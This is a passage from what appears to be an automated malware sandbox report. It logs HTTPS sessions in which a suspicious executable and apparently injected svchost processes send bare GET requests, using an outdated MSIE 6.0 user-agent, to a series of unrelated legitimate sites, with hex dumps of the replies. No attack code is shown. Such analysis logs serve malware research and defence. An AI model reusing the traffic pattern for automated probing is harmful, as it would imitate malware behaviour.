                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: ldh.la.gov
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:00 UTC2828INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:00 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Content-Length: 1346
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:00 UTC2828INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        22192.168.2.35049191.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3982OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3982INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:53:12 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC3983INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4238INData Raw: 4e 41 52 49 55 4d 20 43 45 44 55 52 20 50 54 2e 20 e2 80 9e 43 59 42 45 52 42 45 5a 50 49 45 43 5a 45 c5 83 53 54 57 4f 20 57 2e 2e 2e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 68 33 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 65 74 61 2d 62 6f 74 74 6f 6d 20 68 69 64 65 22 3e 0d 0a 20 0d 0a 32 30 30 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 31 39 2e 30 31 2e 32 30 32 33
                                                                                                                                                                                                                                                                                        Data Ascii: NARIUM CEDUR PT. CYBERBEZPIECZESTWO W...</a> </h3> </div> <div class="meta-bottom hide"> 2000 <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 19.01.2023
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:02 UTC4254INData Raw: 31 32 36 31 38 22 20 61 6c 74 3d 22 47 c5 82 75 63 68 6f 6e 69 65 6d 69 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 0d 0a 31 30 30 30 0d 0a 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31
                                                                                                                                                                                                                                                                                        Data Ascii: 12618" alt="Guchoniemi" /></a></div><div class="item" style="width:300px; height:179px;margin-bottom:10px"><a href="/w20/batony/4596,1000Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=16571


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        23192.168.2.350520172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4270OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:27 UTC8116INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:27 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                        Expires: Wed, 31 May 2023 12:41:10 GMT
                                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 31 May 2023 12:41:10 GMT
                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                                        Set-Cookie: django_language=en; expires=Thu, 30-May-2024 12:41:10 GMT; Max-Age=31536000; Path=/
                                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p78xnKBoHeAh6DyFE6xfEshJ%2BoFkiLolhkJ61yJdai6km%2FKlt1QauQklwSj7H5dixb8R5ktDJdO0l50N3OZdjc8vvnBx%2BjB0iA6Rs%2Fs%2B8L7G7wAo7xsl78d89Q37aVNT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                        CF-RAY: 7cff5a0f8fbf9183-FRA
                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:27 UTC8117INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:27 UTC8117INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        24192.168.2.350521188.114.97.7443C:\Users\user\Desktop\fs7AQcREFX.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4334OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4510INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:03 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                                        Expires: Wed, 31 May 2023 13:02:03 GMT
                                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gN9w9IiDfWcTopsPlRThwISGXZTqLRuT1fD2vULbQ6gOn9UJ%2Br40yMDuG04Dg2UURbPKkaQdGiCfpVlg8M%2BlP7i9QMldhUqpEzzfM9YxyeLyiDdhfjyIoQYo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                        CF-RAY: 7cff5a0f880c360c-FRA
                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4511INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4511INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        25192.168.2.35054735.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4767OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: flamingorecordings.com
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:03 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                        Content-Length: 75193
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        ETag: "6459edff-125b9"
                                                                                                                                                                                                                                                                                        Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                                        X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4768INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex"
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4783INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 35 39 2e 30 33 31 20 31 39 35 2e 32 36 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 36 33 2e 32 35 38 20 31 39 38 2e 39 34 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 34 37 2e 32 32 35 20 31 39 35 2e 32 36 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 35 31 2e 34 35 32 20 31 39 38 2e 39 34 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 33 35 2e 34 31 39 20 31 39 35 2e
                                                                                                                                                                                                                                                                                        Data Ascii: fill="#fff"/><polygon points="197.11 59.031 195.268 61.144 197.11 63.258 198.948 61.144 197.11 59.031" fill="#fff"/><polygon points="197.11 47.225 195.268 49.338 197.11 51.452 198.948 49.338 197.11 47.225" fill="#fff"/><polygon points="197.11 35.419 195.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4799INData Raw: 20 31 31 33 2e 31 35 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 36 33 2e 32 35 38 20 31 31 36 2e 38 33 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 20 31 31 33 2e 31 35 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 35 31 2e 34 35 32 20 31 31 36 2e 38 33 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 33 35 2e 34 31 39 20 31 31 33 2e 31 35 34 20 33 37 2e 35 33 32 20 31 31 34 2e 39 39 36 20 33 39 2e 36 34 36 20 31 31 36 2e 38 33 34 20 33 37 2e 35
                                                                                                                                                                                                                                                                                        Data Ascii: 113.154 61.144 114.996 63.258 116.834 61.144 114.996 59.031" fill="#fff"/><polygon points="114.996 47.225 113.154 49.338 114.996 51.452 116.834 49.338 114.996 47.225" fill="#fff"/><polygon points="114.996 35.419 113.154 37.532 114.996 39.646 116.834 37.5
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4815INData Raw: 34 2e 39 32 31 20 32 34 30 2e 30 34 32 20 31 34 32 2e 38 30 38 20 32 33 38 2e 32 30 33 20 31 34 30 2e 36 39 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 37 2e 35 36 35 20 32 35 30 2e 33 31 36 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 33 2e 33 33 37 20 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 38 2e 34 37 38 20 32 31 35 2e 37 35 39 20 32 35 30 2e 33 31 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 31 2e 35 33 31 20 32 34 36 2e 36 33 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 35
                                                                                                                                                                                                                                                                                        Data Ascii: 4.921 240.042 142.808 238.203 140.694" fill="#fff"/><polygon points="246.638 225.451 248.478 227.565 250.316 225.451 248.478 223.337 246.638 225.451" fill="#fff"/><polygon points="248.478 215.759 250.316 213.645 248.478 211.531 246.636 213.645 248.478 215
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4831INData Raw: 38 20 39 34 2e 34 34 38 20 32 30 33 2e 39 35 32 20 39 36 2e 32 38 36 20 32 30 31 2e 38 33 38 20 39 34 2e 34 34 38 20 31 39 39 2e 37 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 20 39 32 2e 36 31 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 39 32 2e 31 34 36 20 39 36 2e 32 38 36 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33 20 39 32 2e 36 31 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 38 30 2e 33 34 20 39 36 2e 32 38 36 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33
                                                                                                                                                                                                                                                                                        Data Ascii: 8 94.448 203.952 96.286 201.838 94.448 199.725" fill="#fff"/><polygon points="94.448 187.919 92.61 190.032 94.448 192.146 96.286 190.032 94.448 187.919" fill="#fff"/><polygon points="94.448 176.113 92.61 178.226 94.448 180.34 96.286 178.226 94.448 176.113


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        26192.168.2.350561185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC4921OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5081INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:03 GMT
                                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5082INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                                                        Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                        27192.168.2.350571185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5082OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:03 UTC5083INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                        Date: Wed, 31 May 2023 12:52:03 GMT
                                                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
